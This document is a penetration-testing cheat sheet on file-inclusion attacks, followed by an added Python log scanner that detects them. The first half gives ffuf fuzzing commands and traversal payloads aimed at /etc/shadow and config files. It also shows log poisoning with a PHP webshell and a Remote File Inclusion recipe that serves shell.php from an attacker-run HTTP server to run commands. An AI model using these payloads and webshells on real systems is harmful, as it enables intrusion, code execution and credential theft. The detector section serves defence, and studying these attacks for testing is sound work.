LFI

We can discover or detect an LFI using the following fuzzing:

https://github.com/rowbot1/lfi.list/blob/master/list.list

ffuf -c -fs <NUMBER> -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
ffuf -request ../attendance.req --request-proto http -w command.txt -t 50 -x http://127.0.0.1:8080 -enc FUZZ:urlencode

Useful wordlist entries

/etc/passwd
/etc/shadow
/etc/hosts
/etc/issue
/etc/group
/etc/hostname
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/var/log/messages
/var/log/cron.log
/var/log/auth.log
/var/www/html/wp-config.php
/var/www/configuration.php
/var/www/html/inc/header.inc.php
/var/www/html/sites/default/settings.php
/var/www/config.php
C:\Windows\system32\drivers\etc\hosts
C:/Windows/system32/drivers/etc/hosts
C:\Windows\System32\drivers\etc\hosts
C:/Windows/System32/drivers/etc/hosts
C:/Windows/Panther/Unattend/Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:/Windows/Panther/Unattended.xml
C:\Windows\Panther\Unattended.xml
C:/Windows/Panther/Unattend.txt
C:\Windows\Panther\Unattend.txt
C:/Unattend.txt
C:\Unattend.txt
C:/Autounattend.txt
C:\Autounattend.txt
C:/Windows/system32/sysprep
C:/Windows/System32/sysprep
C:\Windows\system32\sysprep
C:\Windows\System32\sysprep
C:/inetpub/wwwroot
C:\inetpub\wwwroot
C:/inetpub/wwwroot/web.config
C:\inetpub\wwwroot\web.config
C:/inetpub/logs/logfiles
C:\inetpub\logs\logfiles
http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>.php?file=../../../../../../../../../../etc/passwd

Up to PHP 5.3 (a null byte %00 still truncates the path):

http://<RHOST>/<FILE>.php?file=../../../../../../../../../../etc/passwd%00

php://filter Wrapper

url=php://filter/convert.base64-encode/resource=app.php

Log Poisoning

Check the following logs:

/var/log/auth.log
/var/log/svftpd.log
/var/log/mail.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/nginx/access.log
/proc/self/environ

https://www.thehacker.recipes/web/inputs/file-inclusion/lfi-to-rce/logs-poisoning

Inject malicious PHP code

http://10.10.0.18/download.php?fid=<?php system($_GET['cmd']); ?>
http://10.10.0.18/download.php?fid=../../../../var/log/nginx/access.log&cmd=whoami

Check the log again:

../../../../../var/log/nginx/access.log

RFI

To obtain an RFI, we start an HTTP server with Python to serve our web shell, like this:

# shell.php
<?php system($_GET['cmd']); ?>
python -m http.server 8000
/site/index.php?page=http://192.168.45.226:8000/shell.php&cmd=whoami
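From the defender's side, every technique in these notes (traversal payloads from the fuzzing wordlist, the %00 truncation, the php://filter wrapper, PHP tags planted in a log for poisoning, and the remote include URL of the RFI section) leaves a recognizable trace in the web server's access log. The following detector is an added example, not part of the original notes: it parses combined-format log lines, URL-decodes them repeatedly so double-encoded traversal is caught, and flags the indicators above; the sample lines, IPs and timestamps are constructed.

```python
import re
from urllib.parse import unquote

# Indicators taken from the techniques in these notes: traversal, null-byte truncation,
# php:// wrappers, PHP tags planted in logs, and remote include URLs.
INDICATORS = {
    "traversal": re.compile(r"\.\.[/\\]"),
    "null_byte": re.compile(r"\x00"),
    "php_wrapper": re.compile(r"\b(php|data|phar|expect)://"),
    "php_tag": re.compile(r"<\?(php|=)"),
    "remote_include": re.compile(r"[?&][^=&]*=https?://"),
    "sensitive_file": re.compile(r"/etc/(passwd|shadow)|/proc/self/environ|/var/log/|web\.config|wp-config\.php"),
}

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" \d{3} \S+ "([^"]*)" "([^"]*)"')

def normalize(text: str) -> str:
    """URL-decode until stable so double-encoded traversal (%252e%252e%252f) is visible too."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text.lower()

def scan_line(line: str):
    """Return (ip, request, [indicator names]) or None if the line is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, request, referer, agent = m.groups()
    # Poisoning payloads can sit in the request line, the referer or the user-agent.
    haystack = normalize(" ".join((request, referer, agent)))
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return ip, request, hits

def scan_log(lines):
    """Return only the parsed lines that trigger at least one indicator."""
    return [r for r in (scan_line(l) for l in lines) if r and r[2]]

# Constructed sample lines (not real traffic); IPs and timestamps are placeholders.
SAMPLE_LOG = [
    '10.0.0.2 - - [10/Oct/2023:13:55:30 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=app.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /download.php?fid=%252e%252e%252f%252e%252e%252fvar/log/nginx/access.log%00 HTTP/1.1" 404 0 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.0.0.9 - - [10/Oct/2023:13:56:15 +0000] "GET /site/index.php?page=http://203.0.113.10:8000/shell.php&cmd=id HTTP/1.1" 200 30 "-" "curl/8.0"',
]
```

Running `scan_log(SAMPLE_LOG)` returns the four attack lines with their indicator names and drops the benign request; a burst of flagged lines from one IP is the usual sign of the ffuf wordlist run described at the top of these notes.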